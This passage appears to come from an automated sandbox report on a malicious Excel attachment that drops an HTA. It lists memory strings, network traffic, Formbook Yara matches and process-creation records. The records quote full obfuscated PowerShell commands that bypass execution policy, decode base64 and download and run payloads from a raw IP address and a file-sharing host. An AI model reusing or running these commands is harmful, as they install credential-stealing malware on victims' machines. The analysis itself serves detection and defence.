0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.448366945.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.507185245.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000D.00000002.507185245.00000000022C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1016.filemail.com
Source: powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/
Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/H
Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/L
Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, PO#BBGR2411PO69.xls, 09230000.0.dr	String found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty
Source: mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&s
Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/S
Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/r
Source: mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linkjago.me/v
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: PO#BBGR2411PO69.xls	OLE: Microsoft Excel 2007+
Source: PO#BBGR2411PO69.xls	OLE: Microsoft Excel 2007+
Source: 09230000.0.dr	OLE: Microsoft Excel 2007+
Source: 09230000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
